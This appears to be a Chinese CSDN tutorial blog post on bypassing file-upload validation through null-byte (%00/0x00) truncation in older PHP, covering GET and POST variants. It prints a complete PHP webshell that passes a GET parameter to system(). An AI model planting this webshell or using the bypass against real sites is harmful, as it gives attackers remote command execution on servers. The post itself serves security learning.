文件上传-绕过白名单验证

最新推荐文章于 2024-07-28 15:11:54 发布
最新推荐文章于 2024-07-28 15:11:54 发布
阅读量1.2w 收藏 7
点赞数
分类专栏: 文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25899635/article/details/90410858
版权
本文探讨了00截断原理,它如何影响文件名读取,特别是在PHP5.3之前的版本中。提到0x00字符在某些函数中作为结束符,可能导致安全问题。同时,讲解了GET型和POST型00截断的差异,并强调了在绕过黑名单验证中的应用。最后,提到了利用此漏洞执行webshell的一句话代码。
摘要由CSDN通过智能技术生成

绕过黑名单验证(00截断绕过)

00截断原理
0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。
系统在对文件名的读取时,如果遇到0x00,就会认为读取已结束。
在PHP5.3之后的版本中完全修复了00截断。并且00截断受限于GPC,addslashes函数。
GET型00截断
GET型提交的内容会被自动进行URL解码。
注意:一定要关闭GPC,否则无法成功。
在这里插入图片描述
在这里插入图片描述
POST型00截断
在POST请求中,%00不会被自动解码,需要在16进制中进行修改00
在这里插入图片描述
一句话代码执行webshell
使用php中的函数system执行GET提交的参数。

<?php
	if($_GET){
		$cmd = $_GET["cmd"];
		system($cmd);
	}else{
		echo "no cmd";
	}
?>

在这里插入图片描述

Mandorr
关注
专栏目录
【愚公系列】2023年04月 文件上传渗透测试之绕过白名单检查(Content-Type、%00截断、0x00截断、CVE-2015-2348)
时光隧道
08-22 5万+
文件上传漏洞是一种安全漏洞,指攻击者通过网站上传功能上传恶意文件来攻击网站的漏洞。攻击者可以通过利用这种漏洞上传恶意文件来执行代码和命令,进而控制网站、窃取敏感信息等。常见的文件上传漏洞主要存在于没有健全的文件上传验证机制的网站中。白名单检查是一种安全机制,用于限制只有列入特定名单中的人员、设备或程序才可以获得访问权限,而不允许其他未经授权的访问。这种机制通常用于保护敏感数据或系统不被未经授权的访问和攻击。在白名单检查中,只有列入白名单的实体允许通过验证,而不在白名单中的所有实体都被阻止访问相关资源。
第十一节 文件上传-绕过白名单验证(00截断绕过)-01
09-15
第十一节 文件上传-绕过白名单验证(00截断绕过)-01
WEB 漏洞-文件上传之后端黑白名单绕过
weixin_65409651的博客
06-20 349
【代码】WEB 漏洞-文件上传之后端黑白名单绕过
【网络安全】文件上传白名单及数组绕过技巧
最新发布
goldfish8848的博客
07-28 1160
将客户端数据以文件形式封装,通过网络协议发送到服务器端,在服务器解析数据,最终在服务端硬盘上作为真实的文件保存。
深入浅出带你了解文件上传白名单绕过
dzqxwzoe的博客
05-12 1481
今天比较详细的讲了文件上传白名单绕过原理以及应用方法,可能刚开始学不太好理解。有兴趣的小伙伴可以自己去搭建靶机来进行测试,喜欢的小伙伴不妨一键三连。# 学习计划安排我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉。
文件上传 黑名单&白名单绕过(上)
她叫常玉莹
10-04 5194
前言 文件上传常见验证: 后缀名:类型,文件头 后缀名:黑名单,白名单 文件类型:MIME信息 文件头:内容信息 php与html代码混编 $_FILES[表单上传name][‘name’] <?php $_FILES[upload_file]['name']; ?> <form method="post" action=""> <p>请上传需要上传的文件:</p> <input class="input_file" type="file" name=
上传漏洞--名单绕过
aipei5098的博客
07-07 209
1、黑名单绕过 <title>图片上传</title> <body> <form action="blacklist.php" method="post" enctype="multipart/form-data"> <input type='file' name='file' id='file'>&...
一道面试题引发的思考第一篇-文件上传白名单绕过
Love&Share
12-25 1957
一道面试题引发的思考第一篇-文件上传白名单,这种问题简直是对 CTFer 的重大利好,跟进,举例一些白名单绕过的方法(掺杂几个黑名单绕过和解析漏洞的学习)
第九节 文件上传-绕过黑名单验证(路径拼接绕过)-01
09-15
3. 文件上传安全:在实现文件上传时,需要注意安全问题,例如使用白名单验证,限制文件类型和大小,使用随机化重命名等。 4. 攻击技术:攻击者可以通过上传小Webshell,大Webshell绕过上传过程中对文件大小等限制,...
第三节 文件上传-绕过黑名单验证-01
09-15
例如,如果攻击者上传了一个名为“image.php.jpg”的文件,可能会绕过白名单验证。因此,基于文件后缀名验证需要与其他安全机制结合使用,以确保文件上传的安全。 二、基于黑名单验证代码分析 基于黑名单验证代码...
第十节 文件上传-绕过黑名单验证(双写绕过)-01
09-15
因此,服务器管理员需要采取一些安全措施来防止这种攻击,例如使用白名单验证、限制上传文件类型、使用防火墙等。 本课程主要讲解了文件上传绕过黑名单验证的原理和方法,包括双写绕过原理、基于黑名单验证代码分析...
上传漏洞,后端黑白名单绕过(21)
san3144393495的博客
05-13 1227
后缀名又分为黑名单和白名单,黑名单指的是,明确不允许上传的脚本格式,如asp,php,jsp,aspx,cgi,war等。这个后门的值的就是mime的值,换一个文件上传,所产生的值都不一样,通过这个值就能判断你是什么文件类型,gif值的最后面就显示gif,是png就显示png,这种验证方式也是很好绕过的,我们一个一个来说,这个后缀名,大部分可以上传的对方都不允许脚本格式的上传,对方的代码判断的,直接查看文件名后缀,间接的通过类型和文件头去判断。文件上传常见的验证,:后缀名,类型,文件头等。
文件上传之后端黑白名单绕过
m0_60052233的博客
09-04 1083
演示案例:upload-lab关卡分析 Pass-2(MIME类型) Pass-3 Pass-4
web安全第六天:绕过白名单监测实现文件上传
cc777777777的博客
02-27 3711
web安全第六天:绕过白名单监测实现文件上传
文件上传漏洞之黑白名单绕过(一)
胖虎的博客
11-26 3099
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 目录 文章目录 一、文件上传最常见的验证方式: 后缀名,类型,文件头等 后缀名:黑名单,白名单 文件类型:MIME信息 文件头:内容头信息 .htaccess解析 一、文件上传最常见的验证方式: 后缀名,类型,文件头等 后缀名:黑名单,白名单 文件类型:MIME信息 文件头:内容头信息 .htaccess解析 二、使用步骤 1.后缀名 黑名单:明确不允许上传的格式后缀,在限制中可能不
文件上传漏洞进阶教程/白名单绕过/图片马制作/图片马执行
ChenD的学习笔记
10-23 7839
文件上传漏洞进阶教程/白名单绕过/图片马制作/图片马执行
绕过文件上传黑名单验证策略与实战
在第三节的“文件上传-绕过黑名单验证-01”内容中,我们深入探讨了如何在Web开发中处理文件上传安全问题,特别是针对文件后缀名验证的策略。文件上传模块是Web应用程序常见的功能,但也常常成为攻击者利用的入口点,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值